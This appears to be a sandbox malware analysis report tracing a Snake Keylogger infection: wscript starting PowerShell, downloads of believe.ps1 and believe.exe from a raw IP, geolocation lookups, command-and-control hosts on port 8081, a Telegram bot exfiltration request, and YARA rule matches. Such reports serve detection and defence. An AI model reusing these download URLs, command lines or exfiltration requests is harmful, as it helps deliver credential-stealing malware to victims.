                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
                  Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
                  Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:445817%0D%0ADate%20and%20Time:%2014/03/2025%20/%2012:09:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20445817%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /dev/believe.ps1 HTTP/1.1 | Accept: */* | Accept-Language: en-ch | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 176.65.144.3 | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /dev/believe.exe HTTP/1.1 | Host: 176.65.144.3 | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                  Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 13 Mar 2025 09:22:34 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: x.exe, 0000000A.00000002.1435246368.0000000002C72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://176.65.144.3
                  Source: wscript.exe, 00000000.00000003.1371839650.0000026208450000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.65.144.3/
                  Source: x.exe, 0000000A.00000002.1435246368.0000000002C09000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://176.65.144.3/dev/believe.exe
                  Source: x.exe, 0000000A.00000002.1435246368.0000000002C0D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://176.65.144.3/dev/believe.exeP
                  Source: wscript.exe, 00000000.00000003.1228286443.000002620808E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228238787.0000026208071000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1462936852.000002620808C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1464059045.0000026208447000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1377013226.0000026208118000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.65.144.3/dev/believe.ps1
                  Source: wscript.exe, 00000000.00000003.1371839650.0000026208450000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.65.144.3/dev/believe.ps1i
                  Source: wscript.exe, 00000000.00000003.1371839650.0000026208450000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.65.144.3/dev/believe.ps1ro
                  Source: x.exe, 0000000A.00000002.1437008178.0000000004409000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000A.00000002.1437008178.0000000004469000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2532782484.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: x.exe, 0000000A.00000002.1437008178.0000000004409000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000A.00000002.1437008178.0000000004469000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2532782484.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
                  Source: x.exe, 0000000A.00000002.1437008178.0000000004409000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000A.00000002.1437008178.0000000004469000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2532782484.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002DC8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002DB9000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002D99000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002DAB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002DB9000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002D99000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002DAB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
                  Source: x.exe, 0000000A.00000002.1437008178.0000000004409000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000A.00000002.1437008178.0000000004469000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2532782484.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
                  Source: powershell.exe, 00000008.00000002.1435086451.000001DE1007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1435086451.000001DE1021D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1410607287.000001DE01B56000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000008.00000002.1410607287.000001DE01A0C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002DB9000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002D99000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002DAB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.org
                  Source: powershell.exe, 00000008.00000002.1410607287.000001DE00001000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000A.00000002.1435246368.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: x.exe, 0000000A.00000002.1437008178.0000000004409000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000A.00000002.1437008178.0000000004469000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2532782484.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
                  Source: powershell.exe, 00000008.00000002.1410607287.000001DE01614000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: powershell.exe, 00000008.00000002.1410607287.000001DE01A0C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: x.exe, 0000000B.00000002.2543408283.0000000003EBE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org?q=
                  Source: powershell.exe, 00000008.00000002.1410607287.000001DE00001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002DC8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002CD5000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002DC8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
                  Source: x.exe, 0000000A.00000002.1437008178.0000000004409000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000A.00000002.1435246368.0000000002C85000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000A.00000002.1437008178.0000000004469000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002CD5000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002DC8000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2532782484.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002CD5000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002DC8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002DC8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:445817%0D%0ADate%20a
                  Source: x.exe, 0000000B.00000002.2543408283.0000000003EBE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: x.exe, 0000000B.00000002.2543408283.0000000003EBE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: x.exe, 0000000B.00000002.2543408283.0000000003EBE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en4
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002D4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enh
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002D57000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                  Source: powershell.exe, 00000008.00000002.1410607287.000001DE01B56000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000008.00000002.1410607287.000001DE01B56000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000008.00000002.1410607287.000001DE01B56000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                  Source: x.exe, 0000000B.00000002.2543408283.0000000003EBE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: x.exe, 0000000B.00000002.2543408283.0000000003EBE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                  Source: x.exe, 0000000B.00000002.2543408283.0000000003EBE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: x.exe, 0000000B.00000002.2543408283.0000000003EBE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gemini.google.com/app?q=
                  Source: powershell.exe, 00000008.00000002.1410607287.000001DE01A0C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                  Source: wscript.exe, 00000000.00000003.1371839650.0000026208450000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1464059045.0000026208447000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
                  Source: powershell.exe, 00000008.00000002.1435086451.000001DE1007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1435086451.000001DE1021D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1410607287.000001DE01B56000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 00000008.00000002.1410607287.000001DE01614000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
                  Source: powershell.exe, 00000008.00000002.1410607287.000001DE01614000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002CD5000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002DB9000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002C3E000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002D99000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002CAE000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002DAB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
                  Source: x.exe, 0000000A.00000002.1437008178.0000000004409000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000A.00000002.1437008178.0000000004469000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002C3E000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2532782484.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002DAB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002CD5000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002DB9000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002C68000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002D99000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002CAE000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002DAB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                  Source: x.exe, 0000000B.00000002.2543408283.0000000003EBE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/v20
                  Source: x.exe, 0000000B.00000002.2543408283.0000000003EBE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002D8D000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002D7E000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002CF9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002D8D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/4
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002D7E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/h
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002D88000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB
                  Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
                  Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
                  Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
                  Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49742 version: TLS 1.2

                  System Summary

                  Source: dump.pcap, type: PCAP | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.x.exe.44695b0.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.x.exe.44695b0.3.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.2.x.exe.44695b0.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 11.2.x.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.x.exe.2c89c50.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.2.x.exe.2c85409.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.2.x.exe.2c85409.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.2.x.exe.2c89c50.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 11.2.x.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 11.2.x.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.2.x.exe.44695b0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.x.exe.44695b0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.2.x.exe.44695b0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0000000A.00000002.1437008178.0000000004409000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000B.00000002.2532782484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000A.00000002.1437008178.0000000004469000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 7912, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: x.exe PID: 8060, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: x.exe PID: 2424, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: x.exe PID: 2424, type: MEMORYSTR | Matched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\x.exe
                  Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                  Source: C:\Windows\System32\wscript.exe | COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 10_2_00E90848
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 10_2_00E97AE8
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 10_2_00E91DD0
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 10_2_00E98508
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 10_2_00E99810
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 10_2_00E97ADA
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 10_2_00E984F8
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 10_2_00E995E8
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 10_2_00E995D9
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 10_2_00E997C4
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_00ECA088
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_00ECC146
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_00ECD278
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_00EC5370
